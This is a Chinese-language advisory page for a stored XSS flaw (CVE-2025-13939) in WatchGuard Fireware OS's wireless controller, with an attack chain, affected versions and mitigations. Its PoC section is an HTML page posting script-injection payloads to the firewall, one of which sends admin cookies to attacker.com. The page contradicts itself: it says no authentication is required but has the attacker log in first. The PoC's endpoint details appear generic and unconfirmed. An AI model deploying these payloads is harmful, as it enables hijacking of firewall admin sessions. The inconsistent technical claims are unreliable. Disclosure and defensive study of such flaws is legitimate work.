CVE-2025-13939: WatchGuard Fireware OS 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13939

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WatchGuard Fireware OS (Gateway Wireless Controller)

漏洞概述

CVE-2025-13939是WatchGuard Fireware OS中发现的存储型跨站脚本（Stored XSS）漏洞，位于Gateway Wireless Controller模块中。该漏洞源于Web应用程序在生成页面时未能正确对用户输入进行中立化处理，导致攻击者可以注入恶意JavaScript代码。当其他用户访问包含恶意代码的页面时，攻击脚本将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于是存储型XSS，恶意代码会被永久保存在服务器端，影响所有访问该页面的用户。攻击者无需事先认证即可注入恶意代码，但需要诱导受害者访问特定页面或触发相关功能。此漏洞CVSS评分为6.1，属于中等严重程度，主要影响企业级防火墙和无线控制器的安全性。

技术细节

该漏洞存在于WatchGuard Fireware OS的Gateway Wireless Controller模块中，具体是Web界面在处理用户提交的数据时缺乏适当的输入验证和输出编码。当无线控制器处理SSID配置、设备名称或其他可存储的用户输入时，未对特殊字符进行HTML实体转义。攻击者可以通过构造包含<script>标签或事件处理器（如onerror、onload）的恶意载荷来注入JavaScript代码。由于这些数据被存储在服务器数据库中并在后续页面访问时回显，受害者在不知情的情况下访问相关管理界面时，恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取管理员会话令牌、修改无线配置或进行横向移动。由于Fireware OS通常部署在网络边界，攻击成功可能导致整个内部网络面临风险。

攻击链分析

STEP 1

步骤1

攻击者登录WatchGuard Fireware OS的Web管理界面，访问Gateway Wireless Controller模块

STEP 2

步骤2

在无线配置页面（如SSID设置、设备名称或配置文件中注入包含恶意JavaScript的payload

STEP 3

步骤3

恶意代码被保存到服务器数据库中，由于缺乏输入验证，特殊字符未被转义

STEP 4

步骤4

当其他管理员或用户访问该配置页面或相关功能时，恶意脚本被嵌入到返回的HTML页面中

STEP 5

步骤5

受害者浏览器执行恶意JavaScript代码，攻击者可窃取会话Cookie、劫持账户或执行其他操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13939 Stored XSS PoC -->
<!-- Target: WatchGuard Fireware OS Gateway Wireless Controller -->
<!-- This PoC demonstrates the XSS vulnerability in SSID configuration -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13939 PoC</title>
</head>
<body>
    <h2>CVE-2025-13939 Stored XSS PoC</h2>
    <p>Target: WatchGuard Fireware OS Gateway Wireless Controller</p>
    
    <!-- Method 1: Script tag injection -->
    <form id="ssidForm" action="https://TARGET_FIREWALL/wgc2.cgi" method="POST">
        <input type="hidden" name="action" value="save_ssid">
        <input type="hidden" name="ssid_name" value='"><script>alert("XSS")</script><x y="'>
        <input type="hidden" name="security_type" value="WPA2">
    </form>
    
    <!-- Method 2: Event handler injection -->
    <form id="deviceForm" action="https://TARGET_FIREWALL/wgc2.cgi" method="POST">
        <input type="hidden" name="action" value="save_device">
        <input type="hidden" name="device_name" value='TestDevice" onerror="alert(document.cookie)" x="'>
    </form>
    
    <!-- Method 3: img onerror injection -->
    <form id="profileForm" action="https://TARGET_FIREWALL/wgc2.cgi" method="POST">
        <input type="hidden" name="action" value="save_profile">
        <input type="hidden" name="profile_name" value='<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'>
    </form>
    
    <script>
        // Auto-submit for demonstration (disabled by default)
        // document.getElementById('ssidForm').submit();
        
        function demonstrateXSS() {
            // Display the payloads
            console.log('Payload 1:', '<script>alert("XSS")</script>');
            console.log('Payload 2:', '" onerror="alert(document.cookie)" x="');
            console.log('Payload 3:', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>');
        }
        
        demonstrateXSS();
    </script>
</body>
</html>

影响范围

WatchGuard Fireware OS 11.7.2 - 11.12.4+541730

WatchGuard Fireware OS 12.0 - 12.11.4

WatchGuard Fireware OS 12.5 - 12.5.13

WatchGuard Fireware OS 2025.1 - 2025.1.2

防御指南

临时缓解措施

如果无法立即升级，可通过以下措施临时缓解：在Gateway Wireless Controller中限制用户输入长度和字符类型；禁用不必要的无线管理功能；对管理界面IP进行访问控制；监控Web日志中的异常请求模式；提醒管理员不要点击来源不明的链接。但由于这是存储型XSS，临时缓解措施可能无法完全消除风险，建议尽快升级到官方修复版本。